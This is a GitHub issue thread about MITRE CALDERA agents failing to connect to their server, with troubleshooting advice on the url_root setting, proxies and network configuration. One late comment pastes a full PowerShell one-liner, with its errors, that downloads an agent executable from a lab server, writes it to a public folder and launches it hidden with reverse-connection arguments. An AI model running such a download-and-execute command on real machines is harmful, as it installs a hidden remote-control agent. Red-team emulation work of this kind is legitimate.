### ISSUE TITLE
No connection is successful

### ISSUE THREAD

**Issue by b1gw00d** [mitre/caldera#19]
CALDERA Agent No connection is successful
No message in Debug>Connected Agents tab.
What is the possible cause
thanks

**Comment by dm-mitre** [comment]
The agent can be run through a command line to diagnose the problem:
1. Start an Administrator command prompt.
2. If it is installed as a service, stop the service:

```
sc stop cagent
```

3. run the agent in debug mode:

```
C:\Path\to\caldera\cagent.exe debug
```
Post here the results.

**Comment by b1gw00d** [comment]
info 0x400000FF _ created winsvcloghandler
info 0x40001002 - The cagent service has started

**Comment by b1gw00d** [comment]
can u upload about install agent video

**Comment by b1gw00d** [comment]
I use windows server 2008 install agent ,conf.yml and cagent.exe in C:\Program Files\cagent\ ,
administrators cmd run cagent.exe --startup auto install
cagent.exe start
 but No message in Debug>Connected Agents tab.

47/5000
Wǒ bù lǐjiě agent shì rúhé huòqǔ dào fúwùqì de huí lián dìzhǐ de, xīwàng kěyǐ shàngchuán yīgè shìpín huòzhě wéndàng jiǎng jiè yīxià, xièxiè
I do not understand how the agent is to get back to the server address, I hope you can upload a video or document to explain, thank you

**Comment by Fortesqueu** [comment]
![image](https://user-images.githubusercontent.com/19146280/36028246-8ef54c58-0d9e-11e8-8f8e-fddc2d018116.png)

**Comment by b1gw00d** [comment]
installed on 7, 8 and 10 
No connection is successful

**Comment by Fortesqueu** [comment]
I've been able to install caldera server in Ubuntu 17.10 and the agents in 3 VM with Win10. The VM's where the agents are installed have the "Network" tab with the "Bridged Adapted" mode selected.

I've managed to make it work in a private network with an ASUS DSL-N12E router (our LAB testing POC's).  But now I'm moving to a home line, and I'm not able to connect Caldera with the Agents. 
I can send ICMP messages between Server Machine and Client Machine, and also I've allowed the traffic ports between internal IP's in the router firewall interface.

So I'm quite lost in this point, I've probably same issue than you.

**Comment by b1gw00d** [comment]
What chat tools do you use to communicate with each other?

**Comment by Fortesqueu** [comment]
I've just installed Caldera requirements.txt, so you can find them there. The **yarl==1.0.0** version was not working so I've used **yarl==0.18.0**.

**Comment by hf-mitre** [comment]
@b1gw00d 
Here's a link to the cagent installation procedure in case you haven't found it yet. https://caldera.readthedocs.io/en/latest/installation.html#caldera-agent-installation . 

To check connectivity: 
1. Find the url_root value in the conf.yml file that lives next to cagent.exe. 
2. Try pinging the ip address or hostname contained within the url_root value to verify that cagent has a route to the caldera server. 
3. If (2) is successful, then try navigating the url_root in a web browser from the cagent machine-- the caldera server web interface should load.  

@Fortesqueu, cagent will reach out to whatever address is in url_root. If your IP address changes when you connect from home that could be an issue (can a lab machine ping the host listed in url_root when your laptop is at home?).  I'm not sure about the network topology of your lab, but the easiest solution might be to just run the caldera-server inside a VM on the private lab network instead of from your laptop--this will likely be a pain if you're trying to modify the source code though, in which case you could do some magic with ssh reverse port forwarding.  

Proxies can also cause issues.  I believe cagent.exe will respect a proxy set in the HTTPS_PROXY environment variable.  So if your lab machines are configured with a proxy to get to the internet, but the caldera server is running on a local network this can cause issues.

**Comment by b1gw00d** [comment]
@Fortesqueu I think you may need to edit the url_root value

**Comment by b1gw00d** [comment]
@hf-mitre The document does not seem to need to edit the url_root value, I hope we can change the description

**Comment by Fortesqueu** [comment]
It's true, in the conf.yml file from the agent I've changed the **"url_root: https://calderaroot-virtualbox:8888"** for **"url_root: _https://caldera_ip:8888_"** 

So, it's solved. Thank you all for your help.

**Comment by Fortesqueu** [comment]
@b1gw00d , @hf-mitre , I've updated the doc in a fork.

**Comment by leaqi** [comment]
“url_root: https://calderaroot-virtualbox:8888" for "url_root: https://caldera_ip:8888"  domain is the key,you should edit it

**Comment by qq854051086** [comment]
I changed the ip, but my server still does not display the proxy, and the proxy is installed in the VM, you can get the data through ping ip, you can also access the server page through the browser, I guess there may be a problem with my configuration file, suspicious Help me see where my configuration problem is? Thank you very much for your answer.
![123456](https://user-images.githubusercontent.com/38556416/44457451-d1e93800-a635-11e8-9b2f-e47163775e78.png)

**Comment by leaqi** [comment]
make sure url_root:https://server_ip:8888   not your client ip


568626504@qq.com
 
From: qq854051086
Date: 2018-08-22 18:04
To: mitre/caldera
CC: leaqi; Comment
Subject: Re: [mitre/caldera] No connection is successful (#19)
I changed the ip, but my server still does not display the proxy, and the proxy is installed in the VM, you can get the data through ping ip, you can also access the server page through the browser, I guess there may be a problem with my configuration file, suspicious Help me see where my configuration problem is? Thank you very much for your answer.

**Comment by atanu2679** [comment]
PS C:\Users\User> if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="htt
://192.168.1.17:8888/";$socket="192.168.1.17:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Ne
.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$
c.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).R
place("`"","");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "
:\Users\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;Start
Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyl
 hidden;
Exception calling "DownloadData" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:328
+ if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="http://192.168.1.17
:8888/";$socket="192.168.1.17:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc
.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData <<<< ($url);$name=$wc.Respo
nseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace(
"`"","");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Use
rs\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;Start-Proc
ess -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hi
dden;
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Cannot index into a null array.
At line:1 char:361
+ if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="http://192.168.1.17
:8888/";$socket="192.168.1.17:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc
.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHea
ders[ <<<< "Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace(
"`"","");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Use
rs\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;Start-Proc
ess -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hi
dden;
    + CategoryInfo          : InvalidOperation: (Content-Disposition:String) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
Parameter name: bytes"
At line:1 char:649
+ if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="http://192.168.1.17
:8888/";$socket="192.168.1.17:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc
.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHea
ders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","
");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Users\Pub
lic\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes <<<< ("C:\Users\Public\$name.exe",$data)) | Out-Null;Start-Proc
ess -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hi
dden;
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Start-Process : This command cannot be executed due to the error: The system cannot find the file specified.
At line:1 char:710
+ if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="http://192.168.1.17
:8888/";$socket="192.168.1.17:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc
.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHea
ders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","
");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Users\Pub
lic\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;Start-Process <<
<<  -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hi
dden;
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

PS C:\Users\User>

**Comment by clenk** [comment]
Hi @atanu2679, please open a new issue instead of posting on this several years-old one, and provide info like which version of caldera you're running, what command you're running the server with, etc. Just from a cursory look, though, try using the actual IP of your caldera server instead of `0.0.0.0`. You can do this by changing these options in your config file: `app.contact.http`, `app.contact.tcp`.
